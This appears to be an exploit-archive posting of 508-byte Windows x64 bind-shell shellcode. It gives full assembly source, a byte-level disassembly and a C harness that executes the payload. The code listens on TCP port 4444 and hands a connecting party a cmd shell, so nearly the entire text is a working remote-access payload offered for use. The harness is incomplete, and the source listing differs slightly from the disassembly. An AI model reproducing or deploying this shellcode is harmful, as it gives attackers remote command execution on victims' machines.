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Windows x64 Bind Shell TCP Shellcode

Windows x64 Bind Shell TCP Shellcode
Posted Dec 8, 2016
Authored by Roziul Hasan Khan Shifat

508 bytes small Windows x64 bind shell TCP shellcode.

tags | shell, tcp, shellcode
systems | windows
SHA-256 | 033c378fbb4c4aa3050bd53ba4c5a36a47e8578b1899c71cde7dd3d1b6026185

Windows x64 Bind Shell TCP Shellcode

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# Title : Windows x64 Bind Shell TCP Shellcode
# size : 508 bytes
# Date : 08-12-2016
# Author : Roziul Hasan Khan Shifat
# Tested On : Windows 7 Professional x64



section .text
global _start

xor rdx,rdx
mov rax,[gs:rdx+0x60]
mov rsi,[rax+0x18]
mov rsi,[rsi+0x10]
mov rsi,[rax]
mov r14,[rsi+0x30]

mov dl,0x88
mov ebx,[r14+0x3c]
add rbx,r14
mov ebx,[rbx+rdx]
add rbx,r14

mov esi,[rbx+0x1c]
add rsi,r14 ;kernel32.dll base address


mov dx,832
mov ebx,[rsi+rdx*4]
add rbx,r14 ;LoadLibraryA()

mov dl,128
sub rsp,rdx
lea r12,[rsp]


;loading ws2_32.dll

xor rdx,rdx

mov [r12],dword 'ws2_'
mov [r12+4],word '32'
mov [r12+6],byte dl

lea rcx,[r12]

sub rsp,88

call rbx

mov r15,rax ;ws2_32.dll base address
xor rdx,rdx
mov dl,0x88
mov ebx,[r15+0x3c]
add rbx,r15
mov ebx,[rbx+rdx]
add rbx,r15

mov edi,[rbx+0x1c]
add rdi,r15


mov dx,114*4
mov ebx,[rdi+rdx]
add rbx,r15 ;WSAStartup()


xor rcx,rcx
mov cx,408

sub rsp,rcx
lea rdx,[rsp]
mov cx,514

sub rsp,88

call rbx

xor rdx,rdx
mov dx,98*4
mov ebx,[rdi+rdx]
add rbx,r15 ;WSASocketA()


push 6
push 1
push 2

pop rcx
pop rdx
pop r8

xor r9,r9

mov [rsp+32],r9
mov [rsp+40],r9

call rbx

mov r13,rax ;SOCKET
mov ebx,[rdi+80]
add rbx,r15 ;setsockopt()

xor rdx,rdx
mov rcx,r13
mov dx,0xffff

push 4

pop r8

mov [rsp],byte 1
lea r9,[rsp]

sub rsp,88
mov [rsp+32],r8

call rbx

mov ebx,[rdi+4]
add rbx,r15 ;bind()

;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)

push 16
pop r8

xor rdx,rdx

mov [r12],rdx
mov [r12+8],rdx

mov [r12],byte 2
mov [r12+2],word 0x5c11 ;port 4444 (change it if U want)
lea rdx,[r12]

mov rcx,r13

call rbx

mov ebx,[rdi+48]
add rbx,r15 ;listen()


push 1
pop rdx

push r13
pop rcx

call rbx


mov ebx,[rdi]
add rbx,r15 ;accept()

;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)

xor rdx,rdx

mov [r12],rdx
mov [r12+8],rdx

mov dl,16
push rdx

lea r8,[rsp]

lea rdx,[r12]

mov rcx,r13

sub rsp,88
call rbx

xor rdx,rdx
mov [r12],rdx
mov [r12+8],rdx

mov dl,104

xor rcx,rcx
mov [r12],dword edx
mov [r12+4],rcx
mov [r12+12],rcx
mov [r12+20],rcx
mov [r12+24],rcx

mov dl,255
inc rdx

mov [r12+0x3c],edx
mov [r12+0x50],rax
mov [r12+0x58],rax
mov [r12+0x60],rax


mov [r12-4],dword 'cmdA'
mov [r12-1],byte cl

sub rsp,88

lea rdx,[r12-4] ;"cmd"

xor r8,r8 ;NULL

push r8
pop r9 ;NULL

mov [rsp+32],byte 1 ;TRUE
mov [rsp+40],r8 ;0
mov [rsp+48],r8 ;NULL
mov [rsp+56],r8 ;NULL

lea rax,[r12]
mov [rsp+64],rax

lea rax,[r12+104]
mov [rsp+72],rax

xor r10,r10
mov r10w,165*4
mov ebx,[rsi+r10]
add rbx,r14 ;CreateProcessA()

call rbx


mov r10w,297*4
mov ebx,[rsi+r10]
add rbx,r14

push 1
pop rcx

add rsp,88
call rbx



file format pe-x86-64

Disassembly of section .text:

0000000000000000 <_start>:
0: 48 31 d2 xor %rdx,%rdx
3: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
8: 48 8b 70 18 mov 0x18(%rax),%rsi
c: 48 8b 76 10 mov 0x10(%rsi),%rsi
10: 48 ad lods %ds:(%rsi),%rax
12: 48 8b 30 mov (%rax),%rsi
15: 4c 8b 76 30 mov 0x30(%rsi),%r14
19: b2 88 mov $0x88,%dl
1b: 41 8b 5e 3c mov 0x3c(%r14),%ebx
1f: 4c 01 f3 add %r14,%rbx
22: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
25: 4c 01 f3 add %r14,%rbx
28: 8b 73 1c mov 0x1c(%rbx),%esi
2b: 4c 01 f6 add %r14,%rsi
2e: 66 ba 40 03 mov $0x340,%dx
32: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
35: 4c 01 f3 add %r14,%rbx
38: b2 80 mov $0x80,%dl
3a: 48 29 d4 sub %rdx,%rsp
3d: 4c 8d 24 24 lea (%rsp),%r12
41: 48 31 d2 xor %rdx,%rdx
44: 41 c7 04 24 77 73 32 movl $0x5f327377,(%r12)
4b: 5f
4c: 66 41 c7 44 24 04 33 movw $0x3233,0x4(%r12)
53: 32
54: 41 88 54 24 06 mov %dl,0x6(%r12)
59: 49 8d 0c 24 lea (%r12),%rcx
5d: 48 83 ec 58 sub $0x58,%rsp
61: ff d3 callq *%rbx
63: 49 89 c7 mov %rax,%r15
66: 48 31 d2 xor %rdx,%rdx
69: b2 88 mov $0x88,%dl
6b: 41 8b 5f 3c mov 0x3c(%r15),%ebx
6f: 4c 01 fb add %r15,%rbx
72: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
75: 4c 01 fb add %r15,%rbx
78: 8b 7b 1c mov 0x1c(%rbx),%edi
7b: 4c 01 ff add %r15,%rdi
7e: 66 ba c8 01 mov $0x1c8,%dx
82: 8b 1c 17 mov (%rdi,%rdx,1),%ebx
85: 4c 01 fb add %r15,%rbx
88: 48 31 c9 xor %rcx,%rcx
8b: 66 b9 98 01 mov $0x198,%cx
8f: 48 29 cc sub %rcx,%rsp
92: 48 8d 14 24 lea (%rsp),%rdx
96: 66 b9 02 02 mov $0x202,%cx
9a: 48 83 ec 58 sub $0x58,%rsp
9e: ff d3 callq *%rbx
a0: 48 31 d2 xor %rdx,%rdx
a3: 66 ba 88 01 mov $0x188,%dx
a7: 8b 1c 17 mov (%rdi,%rdx,1),%ebx
aa: 4c 01 fb add %r15,%rbx
ad: 6a 06 pushq $0x6
af: 6a 01 pushq $0x1
b1: 6a 02 pushq $0x2
b3: 59 pop %rcx
b4: 5a pop %rdx
b5: 41 58 pop %r8
b7: 4d 31 c9 xor %r9,%r9
ba: 4c 89 4c 24 20 mov %r9,0x20(%rsp)
bf: 4c 89 4c 24 28 mov %r9,0x28(%rsp)
c4: ff d3 callq *%rbx
c6: 49 89 c5 mov %rax,%r13
c9: 8b 5f 50 mov 0x50(%rdi),%ebx
cc: 4c 01 fb add %r15,%rbx
cf: 48 31 d2 xor %rdx,%rdx
d2: 4c 89 e9 mov %r13,%rcx
d5: 66 ba ff ff mov $0xffff,%dx
d9: 6a 04 pushq $0x4
db: 41 58 pop %r8
dd: c6 04 24 01 movb $0x1,(%rsp)
e1: 4c 8d 0c 24 lea (%rsp),%r9
e5: 48 83 ec 58 sub $0x58,%rsp
e9: 4c 89 44 24 20 mov %r8,0x20(%rsp)
ee: ff d3 callq *%rbx
f0: 8b 5f 04 mov 0x4(%rdi),%ebx
f3: 4c 01 fb add %r15,%rbx
f6: 6a 10 pushq $0x10
f8: 41 58 pop %r8
fa: 48 31 d2 xor %rdx,%rdx
fd: 49 89 14 24 mov %rdx,(%r12)
101: 49 89 54 24 08 mov %rdx,0x8(%r12)
106: 41 c6 04 24 02 movb $0x2,(%r12)
10b: 66 41 c7 44 24 02 11 movw $0x5c11,0x2(%r12)
112: 5c
113: 49 8d 14 24 lea (%r12),%rdx
117: 4c 89 e9 mov %r13,%rcx
11a: ff d3 callq *%rbx
11c: 8b 5f 30 mov 0x30(%rdi),%ebx
11f: 4c 01 fb add %r15,%rbx
122: 6a 01 pushq $0x1
124: 5a pop %rdx
125: 41 55 push %r13
127: 59 pop %rcx
128: ff d3 callq *%rbx
12a: 8b 1f mov (%rdi),%ebx
12c: 4c 01 fb add %r15,%rbx
12f: 48 31 d2 xor %rdx,%rdx
132: 49 89 14 24 mov %rdx,(%r12)
136: 49 89 54 24 08 mov %rdx,0x8(%r12)
13b: b2 10 mov $0x10,%dl
13d: 52 push %rdx
13e: 4c 8d 04 24 lea (%rsp),%r8
142: 49 8d 14 24 lea (%r12),%rdx
146: 4c 89 e9 mov %r13,%rcx
149: 48 83 ec 58 sub $0x58,%rsp
14d: ff d3 callq *%rbx
14f: 48 31 d2 xor %rdx,%rdx
152: 49 89 14 24 mov %rdx,(%r12)
156: 49 89 54 24 08 mov %rdx,0x8(%r12)
15b: b2 68 mov $0x68,%dl
15d: 48 31 c9 xor %rcx,%rcx
160: 41 89 14 24 mov %edx,(%r12)
164: 49 89 4c 24 04 mov %rcx,0x4(%r12)
169: 49 89 4c 24 0c mov %rcx,0xc(%r12)
16e: 49 89 4c 24 14 mov %rcx,0x14(%r12)
173: 49 89 4c 24 18 mov %rcx,0x18(%r12)
178: b2 ff mov $0xff,%dl
17a: 48 ff c2 inc %rdx
17d: 41 89 54 24 3c mov %edx,0x3c(%r12)
182: 49 89 44 24 50 mov %rax,0x50(%r12)
187: 49 89 44 24 58 mov %rax,0x58(%r12)
18c: 49 89 44 24 60 mov %rax,0x60(%r12)
191: 41 c7 44 24 fc 63 6d movl $0x41646d63,-0x4(%r12)
198: 64 41
19a: 41 88 4c 24 ff mov %cl,-0x1(%r12)
19f: 48 83 ec 58 sub $0x58,%rsp
1a3: 49 8d 54 24 fc lea -0x4(%r12),%rdx
1a8: 4d 31 c0 xor %r8,%r8
1ab: 41 50 push %r8
1ad: 41 59 pop %r9
1af: c6 44 24 20 01 movb $0x1,0x20(%rsp)
1b4: 4c 89 44 24 28 mov %r8,0x28(%rsp)
1b9: 4c 89 44 24 30 mov %r8,0x30(%rsp)
1be: 4c 89 44 24 38 mov %r8,0x38(%rsp)
1c3: 49 8d 04 24 lea (%r12),%rax
1c7: 48 89 44 24 40 mov %rax,0x40(%rsp)
1cc: 49 8d 44 24 68 lea 0x68(%r12),%rax
1d1: 48 89 44 24 48 mov %rax,0x48(%rsp)
1d6: 4d 31 d2 xor %r10,%r10
1d9: 66 41 ba 94 02 mov $0x294,%r10w
1de: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx
1e2: 4c 01 f3 add %r14,%rbx
1e5: ff d3 callq *%rbx
1e7: 66 41 ba a4 04 mov $0x4a4,%r10w
1ec: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx
1f0: 4c 01 f3 add %r14,%rbx
1f3: 6a 01 pushq $0x1
1f5: 59 pop %rcx
1f6: 48 83 c4 58 add $0x58,%rsp
1fa: ff d3 callq *%rbx



char shellcode[]=\


int main()
int len=strlen(shellcode);
DWORD l=0;
printf("shellcode length : %d\n",len);

//making memory executbale

//hiding windows



(* (int(*)()) shellcode)();

return 0;

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